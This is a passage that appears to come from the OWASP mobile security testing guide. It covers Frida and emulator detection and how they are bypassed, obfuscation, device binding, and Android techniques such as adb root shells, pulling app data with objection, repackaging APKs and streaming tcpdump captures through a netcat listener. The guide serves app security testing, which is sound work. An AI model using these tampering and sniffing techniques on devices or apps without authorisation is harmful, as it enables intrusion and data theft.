iPhone:/var/containers/Bundle/Application/AC5DC1FD-3420-42F3-8CB5-E9D77C4B287A/SwiftSecurity.app/Frameworks root# ls -alh\ntotal 87M\ndrwxr-xr-x 10 _installd _installd 320 Nov 19 06:08 ./\ndrwxr-xr-x 11 _installd _installd 352 Nov 19 06:08 ../\n-rw-r--r-- 1 _installd _installd 70M Nov 16 06:37 FridaGadget.dylib\n-rw-r--r-- 1 _installd _installd 3.8M Nov 16 06:37 libswiftCore.dylib\n-rw-r--r-- 1 _installd _installd 71K Nov 16 06:37 libswiftCoreFoundation.dylib\n-rw-r--r-- 1 _installd _installd 136K Nov 16 06:38 libswiftCoreGraphics.dylib\n-rw-r--r-- 1 _installd _installd 99K Nov 16 06:37 libswiftDarwin.dylib\n-rw-r--r-- 1 _installd _installd 189K Nov 16 06:37 libswiftDispatch.dylib\n-rw-r--r-- 1 _installd _installd 1.9M Nov 16 06:38 libswiftFoundation.dylib\n-rw-r--r-- 1 _installd _installd 76K Nov 16 06:37 libswiftObjectiveC.dylib\n
Looking at these traces that Frida leaves behind, you might already imagine that detecting Frida would be a trivial task. And while it is trivial to detect these libraries, it is equally trivial to bypass such a detection. Detection of tools is a cat and mouse game and things can get much more complicated. The following table shortly presents a set of some typical Frida detection methods and a short discussion on their effectiveness.
Some of the following detection methods are implemented in the iOS Security Suite.
Method Description Discussion Check The Environment For Related Artifacts Artifacts can be packaged files, binaries, libraries, processes, and temporary files. For Frida, this could be the frida-server running in the target (jailbroken) system (the daemon responsible for exposing Frida over TCP) or the frida libraries loaded by the app. Inspecting running services is not possible for an iOS app on a non-jailbroken device. The Swift method CommandLine is not available on iOS to query for information about running processes, but there are unofficial ways, such as by using NSTask. Nevertheless when using this method, the app will be rejected during the App Store review process. There is no other public API available to query for running processes or execute system commands within an iOS App. Even if it would be possible, bypassing this would be as easy as just renaming the corresponding Frida artifact (frida-server/frida-gadget/frida-agent). Another way to detect Frida, would be to walk through the list of loaded libraries and check for suspicious ones (e.g. those including \"frida\" in their names), which can be done by using_dyld_get_image_name
. Checking For Open TCP Ports The frida-server process binds to TCP port 27042 by default. Testing whether this port is open is another method of detecting the daemon. This method detects frida-server in its default mode, but the listening port can be changed via a command line argument, so bypassing this is very trivial. Checking For Ports Responding To D-Bus Auth frida-server
uses the D-Bus protocol to communicate, so you can expect it to respond to D-Bus AUTH. Send a D-Bus AUTH message to every open port and check for an answer, hoping that frida-server
will reveal itself. This is a fairly robust method of detecting frida-server
, but Frida offers alternative modes of operation that don't require frida-server. Please remember that this table is far from exhaustive. For example, two other possible detection mechanisms are:
Both would help to detect Substrate or Frida's Interceptor but, for example, won't be effective against Frida's Stalker. Remember that the success of each of these detection methods will depend on whether you're using a jailbroken device, the specific version of the jailbreak and method and/or the version of the tool itself. At the end, this is part of the cat and mouse game of protecting data being processed on an uncontrolled environment (the end user's device).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#emulator-detection","title":"Emulator Detection","text":"The goal of emulator detection is to increase the difficulty of running the app on an emulated device. This forces the reverse engineer to defeat the emulator checks or utilize the physical device, thereby barring the access required for large-scale device analysis.
As discussed in the section Testing on the iOS Simulator in the basic security testing chapter, the only available simulator is the one that ships with Xcode. Simulator binaries are compiled to x86 code instead of ARM code and apps compiled for a real device (ARM architecture) don't run in the simulator, hence simulation protection was not so much a concern regarding iOS apps in contrast to Android with a wide range of emulation choices available.
However, since its release, Corellium (commercial tool) has enabled real emulation, setting itself apart from the iOS simulator. In addition to that, being a SaaS solution, Corellium enables large-scale device analysis with the limiting factor just being available funds.
With Apple Silicon (ARM) hardware widely available, traditional checks for the presence of x86 / x64 architecture might not suffice. One potential detection strategy is to identify features and limitations available for commonly used emulation solutions. For instance, Corellium doesn't support iCloud, cellular services, camera, NFC, Bluetooth, App Store access or GPU hardware emulation (Metal). Therefore, smartly combining checks involving any of these features could be an indicator for the presence of an emulated environment.
Pairing these results with the ones from 3rd party frameworks such as iOS Security Suite, Trusteer or a no-code solution such as Appdome (commercial solution) will provide a good line of defense against attacks utilizing emulators.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#obfuscation","title":"Obfuscation","text":"The chapter \"Mobile App Tampering and Reverse Engineering\" introduces several well-known obfuscation techniques that can be used in mobile apps in general.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#name-obfuscation","title":"Name Obfuscation","text":"The standard compiler generates binary symbols based on class and function names from the source code. Therefore, if no obfuscation was applied, symbol names remain meaningful and can be easily read straight from the app binary. For instance, a function which detects a jailbreak can be located by searching for relevant keywords (e.g. \"jailbreak\"). The listing below shows the disassembled function JailbreakDetectionViewController.jailbreakTest4Tapped
from the Damn Vulnerable iOS App (DVIA-v2).
__T07DVIA_v232JailbreakDetectionViewControllerC20jailbreakTest4TappedyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
After the obfuscation we can observe that the symbol\u2019s name is no longer meaningful as shown on the listing below.
__T07DVIA_v232zNNtWKQptikYUBNBgfFVMjSkvRdhhnbyyFySbyypF:\nstp x22, x21, [sp, #-0x30]!\nmov rbp, rsp\n
Nevertheless, this only applies to the names of functions, classes and fields. The actual code remains unmodified, so an attacker can still read the disassembled version of the function and try to understand its purpose (e.g. to retrieve the logic of a security algorithm).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#instruction-substitution","title":"Instruction Substitution","text":"This technique replaces standard binary operators like addition or subtraction with more complex representations. For example an addition x = a + b
can be represented as x = -(-a) - (-b)
. However, using the same replacement representation could be easily reversed, so it is recommended to add multiple substitution techniques for a single case and introduce a random factor. This technique is vulnerable to deobfuscation, but depending on the complexity and depth of the substitutions, applying it can still be time consuming.
Control flow flattening replaces original code with a more complex representation. The transformation breaks the body of a function into basic blocks and puts them all inside a single infinite loop with a switch statement that controls the program flow. This makes the program flow significantly harder to follow because it removes the natural conditional constructs that usually make the code easier to read.
The image shows how control flow flattening alters code. See \"Obfuscating C++ programs via control flow flattening\" for more information.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#dead-code-injection","title":"Dead Code Injection","text":"This technique makes the program's control flow more complex by injecting dead code into the program. Dead code is a stub of code that doesn\u2019t affect the original program\u2019s behaviour but increases the overhead for the reverse engineering process.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#string-encryption","title":"String Encryption","text":"Applications are often compiled with hardcoded keys, licences, tokens and endpoint URLs. By default, all of them are stored in plaintext in the data section of an application\u2019s binary. This technique encrypts these values and injects stubs of code into the program that will decrypt that data before it is used by the program.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#recommended-tools","title":"Recommended Tools","text":"Learn more about iOS obfuscation techniques in the paper \"Protecting Million-User iOS Apps with Obfuscation: Motivations, Pitfalls, and Experience\".
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#device-binding","title":"Device Binding","text":"The purpose of device binding is to impede an attacker who tries to copy an app and its state from device A to device B and continue the execution of the app on device B. After device A has been determined trusted, it may have more privileges than device B. This situation shouldn't change when an app is copied from device A to device B.
Since iOS 7.0, hardware identifiers (such as MAC addresses) are off-limits but there are other methods for implementing device binding in iOS:
identifierForVendor
: You can use [[UIDevice currentDevice] identifierForVendor]
(in Objective-C), UIDevice.current.identifierForVendor?.uuidString
(in Swift3), or UIDevice.currentDevice().identifierForVendor?.UUIDString
(in Swift2). The value of identifierForVendor
may not be the same if you reinstall the app after other apps from the same vendor are installed and it may change when you update your app bundle's name. Therefore it is best to combine it with something in the Keychain.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
(if you want to secure the data and properly enforce a passcode or Touch ID requirement), kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
, or kSecAttrAccessibleWhenUnlockedThisDeviceOnly
.Any scheme based on these methods will be more secure the moment a passcode and/or Touch ID is enabled, the materials stored in the Keychain or filesystem are protected with protection classes (such as kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
and kSecAttrAccessibleWhenUnlockedThisDeviceOnly
), and the SecAccessControlCreateFlags
is set either with kSecAccessControlDevicePasscode
(for passcodes), kSecAccessControlUserPresence
(passcode, Face ID or Touch ID), kSecAccessControlBiometryAny
(Face ID or Touch ID) or kSecAccessControlBiometryCurrentSet
(Face ID / Touch ID: but current enrolled biometrics only).
One of the most common things you do when testing an app is accessing the device shell. In this section we'll see how to access the Android shell both remotely from your host computer with/without a USB cable and locally from the device itself.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#remote-shell","title":"Remote Shell","text":"In order to connect to the shell of an Android device from your host computer, adb is usually your tool of choice (unless you prefer to use remote SSH access, e.g. via Termux).
For this section we assume that you've properly enabled Developer Mode and USB debugging as explained in \"Testing on a Real Device\". Once you've connected your Android device via USB, you can access the remote device's shell by running:
adb shell\n
press Control + D or type exit
to quit
Once in the remote shell, if your device is rooted or you're using the emulator, you can get root access by running su
:
bullhead:/ $ su\nbullhead:/ # id\nuid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0\n
Only if you're working with an emulator you may alternatively restart adb with root permissions with the command adb root
so next time you enter adb shell
you'll have root access already. This also allows to transfer data bidirectionally between your host computer and the Android file system, even with access to locations where only the root user has access to (via adb push/pull
). See more about data transfer in section \"Host-Device Data Transfer\" below.
If you have more than one device, remember to include the -s
flag followed by the device serial ID on all your adb
commands (e.g. adb -s emulator-5554 shell
or adb -s 00b604081540b7c6 shell
). You can get a list of all connected devices and their serial IDs by using the following command:
adb devices\nList of devices attached\n00c907098530a82c device\nemulator-5554 device\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#connect-to-a-device-over-wi-fi","title":"Connect to a Device over Wi-Fi","text":"You can also access your Android device without using the USB cable. For this you'll have to connect both your host computer and your Android device to the same Wi-Fi network and follow the next steps:
adb tcpip 5555
.adb connect <device_ip_address>
. Check that the device is now available by running adb devices
.adb shell
.However, notice that by doing this you leave your device open to anyone being in the same network and knowing the IP address of your device. You may rather prefer using the USB connection.
For example, on a Nexus device, you can find the IP address at Settings -> System -> About phone -> Status -> IP address or by going to the Wi-Fi menu and tapping once on the network you're connected to.
See the full instructions and considerations in the Android Developers Documentation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0001/#connect-to-a-device-via-ssh","title":"Connect to a Device via SSH","text":"If you prefer, you can also enable SSH access. A convenient option is to use Termux, which you can easily configure to offer SSH access (with password or public key authentication) and start it with the command sshd
(starts by default on port 8022). In order to connect to the Termux via SSH you can simply run the command ssh -p 8022 <ip_address>
(where ip_address
is the actual remote device IP). This option has some additional benefits as it allows to access the file system via SFTP also on port 8022.
While usually using an on-device shell (terminal emulator) such as Termux might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues or to check some configuration.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/","title":"Host-Device Data Transfer","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-adb","title":"Using adb","text":"You can copy files to and from a device by using the adb commands adb pull <remote> <local>
and adb push <local> <remote>
commands. Their usage is very straightforward. For example, the following will copy foo.txt
from your current directory (local) to the sdcard
folder (remote):
adb push foo.txt /sdcard/foo.txt\n
This approach is commonly used when you know exactly what you want to copy and from/to where and also supports bulk file transfer, e.g. you can pull (copy) a whole directory from the Android device to your host computer.
$ adb pull /sdcard\n/sdcard/: 1190 files pulled. 14.1 MB/s (304526427 bytes in 20.566s)\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-android-studio-device-file-explorer","title":"Using Android Studio Device File Explorer","text":"Android Studio has a built-in Device File Explorer which you can open by going to View -> Tool Windows -> Device File Explorer.
If you're using a rooted device you can now start exploring the whole file system. However, when using a non-rooted device accessing the app sandboxes won't work unless the app is debuggable and even then you are \"jailed\" within the app sandbox.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0002/#using-objection","title":"Using objection","text":"This option is useful when you are working on a specific app and want to copy files you might encounter inside its sandbox (notice that you'll only have access to the files that the target app has access to). This approach works without having to set the app as debuggable, which is otherwise required when using Android Studio's Device File Explorer.
First, connect to the app with Objection as explained in \"Recommended Tools - Objection\". Then, use ls
and cd
as you normally would on your terminal to explore the available files:
$ frida-ps -U | grep -i owasp\n21228 sg.vp.owasp_mobile.omtg_android\n\n$ objection -g sg.vp.owasp_mobile.omtg_android explore\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # cd ..\n/data/user/0/sg.vp.owasp_mobile.omtg_android\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls\nType ... Name\n--------- ... -------------------\nDirectory ... cache\nDirectory ... code_cache\nDirectory ... lib\nDirectory ... shared_prefs\nDirectory ... files\nDirectory ... app_ACRA-approved\nDirectory ... app_ACRA-unapproved\nDirectory ... databases\n\nReadable: True Writable: True\n
One you have a file you want to download you can just run file download <some_file>
. This will download that file to your working directory. The same way you can upload files using file upload
.
...[usb] # ls\nType ... Name\n------ ... -----------------------------------------------\nFile ... sg.vp.owasp_mobile.omtg_android_preferences.xml\n\nReadable: True Writable: True\n...[usb] # file download sg.vp.owasp_mobile.omtg_android_preferences.xml\nDownloading ...\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded ... to sg.vp.owasp_mobile.omtg_android_preferences.xml\n
The downside is that, at the time of this writing, objection does not support bulk file transfer yet, so you're restricted to copy individual files. Still, this can come handy in some scenarios where you're already exploring the app using objection anyway and find some interesting file. Instead of for example taking note of the full path of that file and use adb pull <path_to_some_file>
from a separate terminal, you might just want to directly do file download <some_file>
.
There are several ways of extracting APK files from a device. You will need to decide which one is the easiest method depending if the app is public or private.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#alternative-app-stores","title":"Alternative App Stores","text":"One of the easiest options is to download the APK from websites that mirror public applications from the Google Play Store. However, keep in mind that these sites are not official and there is no guarantee that the application hasn't been repackaged or contain malware. A few reputable websites that host APKs and are not known for modifying apps and even list SHA-1 and SHA-256 checksums of the apps are:
Beware that you do not have control over these sites and you cannot guarantee what they do in the future. Only use them if it's your only option left.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#using-gplaycli","title":"Using gplaycli","text":"You can use gplaycli to download (-d
) the selected APK by specifying its AppID (add -p
to show a progress bar and -v
for verbosity):
$ gplaycli -p -v -d com.google.android.keep\n[INFO] GPlayCli version 3.26 [Python3.7.4]\n[INFO] Configuration file is ~/.config/gplaycli/gplaycli.conf\n[INFO] Device is bacon\n[INFO] Using cached token.\n[INFO] Using auto retrieved token to connect to API\n[INFO] 1 / 1 com.google.android.keep\n[################################] 15.78MB/15.78MB - 00:00:02 6.57MB/s/s\n[INFO] Download complete\n
The com.google.android.keep.apk
file will be in your current directory. As you might imagine, this approach is a very convenient way to download APKs, especially with regards to automation.
You may use your own Google Play credentials or token. By default, gplaycli will use an internally provided token.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#extracting-the-app-package-from-the-device","title":"Extracting the App Package from the Device","text":"Obtaining app packages from the device is the recommended method as we can guarantee the app hasn't been modified by a third-party. To obtain applications from a rooted or non-rooted device, you can use the following methods:
Use adb pull
to retrieve the APK. If you don't know the package name, the first step is to list all the applications installed on the device:
adb shell pm list packages\n
Once you have located the package name of the application, you need the full path where it is stored on the system to download it.
adb shell pm path <package name>\n
With the full path to the APK, you can now simply use adb pull
to extract it.
adb pull <apk path>\n
The APK will be downloaded in your working directory.
Alternatively, there are also apps like APK Extractor that do not require root and can even share the extracted APK via your preferred method. This can be useful if you don't feel like connecting the device or setting up adb over the network to transfer the file.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0003/#testing-instant-apps","title":"Testing Instant Apps","text":"With Google Play Instant you can create Instant apps which can be instantly launched from a browser or the \"try now\" button from the app store from Android 5.0 (API level 21) onward. They do not require any form of installation. There are a few challenges with an instant app:
The combination of these can lead to insecure decisions, such as: stripping too much of the authorization/authentication/confidentiality logic from an app, which allows for information leakage.
Note: Instant apps require an App Bundle. App Bundles are described in the \"App Bundles\" section of the \"Android Platform Overview\" chapter.
Static Analysis Considerations:
Static analysis can be either done after reverse engineering a downloaded instant app, or by analyzing the App Bundle. When you analyze the App Bundle, check the Android Manifest to see whether dist:module dist:instant=\"true\"
is set for a given module (either the base or a specific module with dist:module
set). Next, check for the various entry points, which entry points are set (by means of <data android:path=\"</PATH/HERE>\" />
).
Now follow the entry points, like you would do for any Activity and check:
Dynamic Analysis Considerations:
There are multiple ways to start the dynamic analysis of your instant app. In all cases, you will first have to install the support for instant apps and add the ia
executable to your $PATH
.
The installation of instant app support is taken care off through the following command:
cd path/to/android/sdk/tools/bin && ./sdkmanager 'extras;google;instantapps'\n
Next, you have to add path/to/android/sdk/extras/google/instantapps/ia
to your $PATH
.
After the preparation, you can test instant apps locally on a device running Android 8.1 (API level 27) or later. The app can be tested in different ways:
Deploy as instant app
checkbox in the Run/Configuration dialog) or deploy the app using the following command:ia run output-from-build-command <app-artifact>\n
try now
button in the App store from the testers account.Now that you can test the app, check whether:
If you need to test on a non-jailbroken device you should learn how to repackage an app to enable dynamic testing on it.
Use a computer to perform all the steps indicated in the article \"Patching Android Applications\" from the objection Wiki. Once you're done you'll be able to patch an APK by calling the objection command:
objection patchapk --source app-release.apk\n
The patched application then needs to be installed using adb, as explained in \"Installing Apps\".
This repackaging method is enough for most use cases. For more advanced repackaging, refer to \"Android Tampering and Reverse Engineering - Patching, Repackaging and Re-Signing\".
"},{"location":"MASTG/techniques/android/MASTG-TECH-0005/","title":"Installing Apps","text":"Use adb install
to install an APK on an emulator or connected device.
adb install path_to_apk\n
Note that if you have the original source code and use Android Studio, you do not need to do this because Android Studio handles the packaging and installation of the app for you.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0006/","title":"Listing Installed Apps","text":"When targeting apps that are installed on the device, you'll first have to figure out the correct package name of the application you want to analyze. You can retrieve the installed apps either by using pm
(Android Package Manager) or by using frida-ps
:
$ adb shell pm list packages\npackage:sg.vantagepoint.helloworldjni\npackage:eu.chainfire.supersu\npackage:org.teamsik.apps.hackingchallenge.easy\npackage:org.teamsik.apps.hackingchallenge.hard\npackage:sg.vp.owasp_mobile.omtg_android\n
You can include flags to show only third party apps (-3
) and the location of their APK file (-f
), which you can use afterwards to download it via adb pull
:
$ adb shell pm list packages -3 -f\npackage:/data/app/sg.vantagepoint.helloworldjni-1/base.apk=sg.vantagepoint.helloworldjni\npackage:/data/app/eu.chainfire.supersu-1/base.apk=eu.chainfire.supersu\npackage:/data/app/org.teamsik.apps.hackingchallenge.easy-1/base.apk=org.teamsik.apps.hackingchallenge.easy\npackage:/data/app/org.teamsik.apps.hackingchallenge.hard-1/base.apk=org.teamsik.apps.hackingchallenge.hard\npackage:/data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk=sg.vp.owasp_mobile.omtg_android\n
This is the same as running adb shell pm path <app_package_id>
on an app package ID:
$ adb shell pm path sg.vp.owasp_mobile.omtg_android\npackage:/data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk\n
Use frida-ps -Uai
to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n----- ---------------------------------------- ---------------------------------------\n 766 Android System android\n21228 Attack me if u can sg.vp.owasp_mobile.omtg_android\n 4281 Termux com.termux\n - Uncrackable1 sg.vantagepoint.uncrackable1\n
Note that this also shows the PID of the apps that are running at the moment. Take a note of the \"Identifier\" and the PID if any as you'll need them afterwards.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/","title":"Exploring the App Package","text":"Once you have collected the package name of the application you want to target, you'll want to start gathering information about it. First, retrieve the APK as explained in \"Basic Testing Operations - Obtaining and Extracting Apps\".
APK files are actually ZIP files that can be unpacked using a standard decompression utility such as unzip
. However, we recommend using apktool which additionally decodes the AndroidManifest.xml and disassembles the app binaries (classes.dex) to smali code:
$ apktool d UnCrackable-Level3.apk\n$ tree\n.\n\u251c\u2500\u2500 AndroidManifest.xml\n\u251c\u2500\u2500 apktool.yml\n\u251c\u2500\u2500 lib\n\u251c\u2500\u2500 original\n\u2502 \u251c\u2500\u2500 AndroidManifest.xml\n\u2502 \u2514\u2500\u2500 META-INF\n\u2502 \u251c\u2500\u2500 CERT.RSA\n\u2502 \u251c\u2500\u2500 CERT.SF\n\u2502 \u2514\u2500\u2500 MANIFEST.MF\n\u251c\u2500\u2500 res\n...\n\u2514\u2500\u2500 smali\n
The following files are unpacked:
As unzipping with the standard unzip
utility leaves some files such as the AndroidManifest.xml
unreadable, it's better to unpack the APK using apktool.
$ ls -alh\ntotal 32\ndrwxr-xr-x 9 sven staff 306B Dec 5 16:29 .\ndrwxr-xr-x 5 sven staff 170B Dec 5 16:29 ..\n-rw-r--r-- 1 sven staff 10K Dec 5 16:29 AndroidManifest.xml\n-rw-r--r-- 1 sven staff 401B Dec 5 16:29 apktool.yml\ndrwxr-xr-x 6 sven staff 204B Dec 5 16:29 assets\ndrwxr-xr-x 3 sven staff 102B Dec 5 16:29 lib\ndrwxr-xr-x 4 sven staff 136B Dec 5 16:29 original\ndrwxr-xr-x 131 sven staff 4.3K Dec 5 16:29 res\ndrwxr-xr-x 9 sven staff 306B Dec 5 16:29 smali\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#the-android-manifest","title":"The Android Manifest","text":"The Android Manifest is the main source of information, it includes a lot of interesting information such as the package name, the permissions, app components, etc.
Here's a non-exhaustive list of some info and the corresponding keywords that you can easily search for in the Android Manifest by just inspecting the file or by using grep -i <keyword> AndroidManifest.xml
:
permission
(see \"Android Platform APIs\")android:allowBackup
(see \"Data Storage on Androidactivity
, service
, provider
, receiver
(see \"Android Platform APIs\" and \"Data Storage on Androiddebuggable
(see \"Code Quality and Build Settings of Android Apps\")Please refer to the mentioned chapters to learn more about how to test each of these points.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#app-binary","title":"App Binary","text":"The app binary (classes.dex
) can be found in the root directory of the app package. It is a so-called DEX (Dalvik Executable) file that contains compiled Java code. Due to its nature, after applying some conversions you'll be able to use a decompiler to produce Java code. We've also seen the folder smali
that was obtained after we run apktool. This contains the disassembled Dalvik bytecode in an intermediate language called smali, which is a human-readable representation of the Dalvik executable.
Refer to the section \"Reviewing Decompiled Java Code\" in the chapter \"Tampering and Reverse Engineering on Android\" for more information about how to reverse engineer DEX files.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#compiled-app-binary","title":"Compiled App Binary","text":"In some cases it might be useful to retrieve the compiled app binary (.odex).
First get the path to the app's data directory:
adb shell pm path com.example.myapplication\npackage:/data/app/~~DEMFPZh7R4qfUwwwh1czYA==/com.example.myapplication-pOslqiQkJclb_1Vk9-WAXg==/base.apk\n
Remove the /base.apk
part, add /oat/arm64/base.odex
and use the resulting path to pull the base.odex from the device:
adb root\nadb pull /data/app/~~DEMFPZh7R4qfUwwwh1czYA==/com.example.myapplication-pOslqiQkJclb_1Vk9-WAXg==/oat/arm64/base.odex\n
Note that the exact directory will be different based on your Android version. If the /oat/arm64/base.odex
file can't be found, manually search in the directory returned by pm path
.
You can inspect the lib
folder in the APK:
$ ls -1 lib/armeabi/\nlibdatabase_sqlcipher.so\nlibnative.so\nlibsqlcipher_android.so\nlibstlport_shared.so\n
or from the device with objection:
...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls lib\nType ... Name\n------ ... ------------------------\nFile ... libnative.so\nFile ... libdatabase_sqlcipher.so\nFile ... libstlport_shared.so\nFile ... libsqlcipher_android.so\n
For now this is all information you can get about the native libraries unless you start reverse engineering them, which is done using a different approach than the one used to reverse the app binary as this code cannot be decompiled but only disassembled. Refer to the section \"Reviewing Disassemble Native Code\" in the chapter \"Tampering and Reverse Engineering on Android\" for more information about how to reverse engineer these libraries.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0007/#other-app-resources","title":"Other App Resources","text":"It is normally worth taking a look at the rest of the resources and files that you may find in the root folder of the APK as some times they contain additional goodies like key stores, encrypted databases, certificates, etc.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0008/","title":"Accessing App Data Directories","text":"Once you have installed the app, there is further information to explore, where tools like objection come in handy.
When using objection you can retrieve different kinds of information, where env
will show you all the directory information of the app.
$ objection -g sg.vp.owasp_mobile.omtg_android explore\n\n...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # env\n\nName Path\n---------------------- ---------------------------------------------------------------------------\ncacheDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/cache\ncodeCacheDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/code_cache\nexternalCacheDirectory /storage/emulated/0/Android/data/sg.vp.owasp_mobile.omtg_android/cache\nfilesDirectory /data/user/0/sg.vp.owasp_mobile.omtg_android/files\nobbDir /storage/emulated/0/Android/obb/sg.vp.owasp_mobile.omtg_android\npackageCodePath /data/app/sg.vp.owasp_mobile.omtg_android-kR0ovWl9eoU_yh0jPJ9caQ==/base.apk\n
Among this information we find:
/data/data/[package-name]
or /data/user/0/[package-name]
/storage/emulated/0/Android/data/[package-name]
or /sdcard/Android/data/[package-name]
/data/app/
The internal data directory is used by the app to store data created during runtime and has the following basic structure:
...g.vp.owasp_mobile.omtg_android on (google: 8.1.0) [usb] # ls\nType ... Name\n--------- ... -------------------\nDirectory ... cache\nDirectory ... code_cache\nDirectory ... lib\nDirectory ... shared_prefs\nDirectory ... files\nDirectory ... databases\n\nReadable: True Writable: True\n
Each folder has its own purpose:
However, the app might store more data not only inside these folders but also in the parent folder (/data/data/[package-name]
).
Refer to the \"Testing Data Storage\" chapter for more information and best practices on securely storing sensitive data.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0009/","title":"Monitoring System Logs","text":"On Android you can easily inspect the log of system messages by using Logcat
. There are two ways to execute Logcat:
adb logcat > logcat.log\n
With the following command you can specifically grep for the log output of the app in scope, just insert the package name. Of course your app needs to be running for ps
to be able to get its PID.
adb logcat | grep \"$(adb shell ps | grep <package-name> | awk '{print $2}')\"\n
If you already know the app PID you may give it directly using --pid
flag.
You may also want to apply further filters or regular expressions (using logcat
's regex flags -e <expr>, --regex=<expr>
for example) if you expect certain strings or patterns to come up in the logs.
Remotely sniffing all Android traffic in real-time is possible with tcpdump, netcat (nc), and Wireshark. First, make sure that you have the latest version of Android tcpdump on your phone. Here are the installation steps:
adb root\nadb remount\nadb push /wherever/you/put/tcpdump /system/xbin/tcpdump\n
If execution of adb root
returns the error adbd cannot run as root in production builds
, install tcpdump as follows:
adb push /wherever/you/put/tcpdump /data/local/tmp/tcpdump\nadb shell\nsu\nmount -o rw,remount /system;\ncp /data/local/tmp/tcpdump /system/xbin/\ncd /system/xbin\nchmod 755 tcpdump\n
In certain production builds, you might encounter an error mount: '/system' not in /proc/mounts
.
In that case, you can replace the above line $ mount -o rw,remount /system;
with $ mount -o rw,remount /
, as described in this Stack Overflow post.
Remember: To use tcpdump, you need root privileges on the phone!
Execute tcpdump
once to see if it works. Once a few packets have come in, you can stop tcpdump by pressing CTRL+c.
$ tcpdump\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes\n04:54:06.590751 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n04:54:09.659658 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n04:54:10.579795 00:9e:1e:10:7f:69 (oui Unknown) > Broadcast, RRCP-0x23 reply\n^C\n3 packets captured\n3 packets received by filter\n0 packets dropped by kernel\n
To remotely sniff the Android phone's network traffic, first execute tcpdump
and pipe its output to netcat
(nc):
tcpdump -i wlan0 -s0 -w - | nc -l -p 11111\n
The tcpdump command above involves
-
, which will make tcpdump write to stdout.By using the pipe (|
), we sent all output from tcpdump to netcat, which opens a listener on port 11111. You'll usually want to monitor the wlan0 interface. If you need another interface, list the available options with the command $ ip addr
.
To access port 11111, you need to forward the port to your host computer via adb.
adb forward tcp:11111 tcp:11111\n
The following command connects you to the forwarded port via netcat and piping to Wireshark.
nc localhost 11111 | wireshark -k -S -i -\n
Wireshark should start immediately (-k). It gets all data from stdin (-i -) via netcat, which is connected to the forwarded port. You should see all the phone's traffic from the wlan0 interface.
You can display the captured traffic in a human-readable format with Wireshark. Figure out which protocols are used and whether they are unencrypted. Capturing all traffic (TCP and UDP) is important, so you should execute all functions of the tested application and analyze it.
This neat little trick allows you now to identify what kind of protocols are used and to which endpoints the app is talking to. The questions is now, how can I test the endpoints if Burp is not capable of showing the traffic? There is no easy answer for this, but a few Burp plugins that can get you started.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#firebasegoogle-cloud-messaging-fcmgcm","title":"Firebase/Google Cloud Messaging (FCM/GCM)","text":"Firebase Cloud Messaging (FCM), the successor to Google Cloud Messaging (GCM), is a free service offered by Google that allows you to send messages between an application server and client apps. The server and client app communicate via the FCM/GCM connection server, which handles downstream and upstream messages.
Downstream messages (push notifications) are sent from the application server to the client app; upstream messages are sent from the client app to the server.
FCM is available for Android, iOS, and Chrome. FCM currently provides two connection server protocols: HTTP and XMPP. As described in the official documentation, these protocols are implemented differently. The following example demonstrates how to intercept both protocols.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#preparation-of-test-setup","title":"Preparation of Test Setup","text":"You need to either configure iptables on your phone or use bettercap to be able to intercept traffic.
FCM can use either XMPP or HTTP to communicate with the Google backend.
